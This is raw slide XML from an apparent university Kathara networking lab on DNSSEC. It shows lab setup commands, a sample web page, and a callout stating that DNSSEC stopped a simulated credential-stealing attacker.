            <p:cNvPr id="37" name="Group 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74C781E1-26F0-E617-5B0A-EED0E167F6E2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="10920536" y="2466851"/>
              <a:ext cx="581348" cy="126235"/>
              <a:chOff x="8092857" y="2115830"/>
              <a:chExt cx="581348" cy="126235"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="38" name="Rectangle 15">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA9EE7A9-5D63-B2C0-B142-D4E0BA43A2C6}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8548205" y="2116065"/>
                <a:ext cx="126000" cy="126000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FF0000">
                  <a:alpha val="50196"/>
                </a:srgbClr>
              </a:solidFill>
              <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
                <a:solidFill>
                  <a:srgbClr val="4472C4">
                    <a:shade val="50000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:miter lim="800000"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr rtlCol="0" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="39" name="Rectangle 16">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74E03ACF-FC56-2093-FA38-F177F99D0884}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8092857" y="2115830"/>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algn="r" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="40" name="Rectangle 17">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4D0301F-F511-C652-20CF-73E12755440E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8320531" y="2115830"/>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algn="r" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21509" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8CC7F136-A1BF-D5B1-B198-349E84FD227B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>view hacker database</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Segnaposto data 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7E5F34F-F655-BFB2-C0EB-F21D080ED0E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Segnaposto piè di pagina 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A44B39C0-D7E6-94B0-1680-D606CC2190EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21508" name="Rectangle 64">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C11E471-2091-6A05-734F-41D7E00CF22F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4800600" y="6434123"/>
            <a:ext cx="181822" cy="371513"/>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endParaRPr lang="en-US" sz="1800" noProof="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="AutoShape 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90512938-EAE3-759D-22FE-BA8D11C3D1E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7148945" y="4314433"/>
            <a:ext cx="4055062" cy="1088840"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -92427"/>
              <a:gd name="adj2" fmla="val -99619"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="46800" rIns="90000" bIns="46800"/>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0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>evil's database is empty, DNSSEC worked. The student's credentials were not stolen by the hacker.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36722060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350F57-0FEC-2050-953B-5F16DF3B8A18}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C638C6A4-89C8-9C59-E358-DCCC40B12EA8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2390774" y="1925216"/>
            <a:ext cx="7410451" cy="3007568"/>
            <a:chOff x="126" y="3294"/>
            <a:chExt cx="5943" cy="778"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADFA99BB-19AC-5A7B-B94B-00DD0555E31C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3352"/>
              <a:ext cx="5943" cy="720"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw dist="107763" dir="2700000" algn="ctr" rotWithShape="0">
                <a:schemeClr val="bg2"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>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endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>&lt;html&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>&lt;head&gt;&lt;title&gt;UniRoma3 Official&lt;/title&gt;&lt;/head&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>&lt;body&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>&lt;pre&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Hello from UniRoma3!</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>...</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>&lt;/pre&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>&lt;/body&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>&lt;/html&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53082DD1-4D4E-6ED2-B9E9-231C782B25C0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="171" y="3294"/>
              <a:ext cx="3548" cy="97"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>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r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>uniromatre</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/var/www/html/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>index.php</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14340" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0630ECF-5E2A-138B-B771-1BE4D2E46BBC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>a quick look at the lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{939F22CA-34E4-D865-B623-48C3D2E0C949}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CEBF5B4-52F5-10F1-5E34-9F8818BACF78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38132115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C5B959-9DF1-0A49-DF61-AFEB50F6B245}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E1A6A1F-02C4-692A-2A35-ADA832A346F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1373289" y="1697821"/>
            <a:ext cx="9445421" cy="3278950"/>
            <a:chOff x="-1816" y="2644"/>
            <a:chExt cx="9827" cy="2037"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F987A5CA-7E48-539B-C473-9B79F2D892A9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="-1816" y="2758"/>
              <a:ext cx="9827" cy="1923"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw dist="107763" dir="2700000" algn="ctr" rotWithShape="0">
                <a:schemeClr val="bg2"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>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endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ip</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> address add 210.0.3.50/24 dev eth0</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ip</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> route add default via 210.0.3.1</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>mkdir</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> -p /var/www/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>db</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>mkdir</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
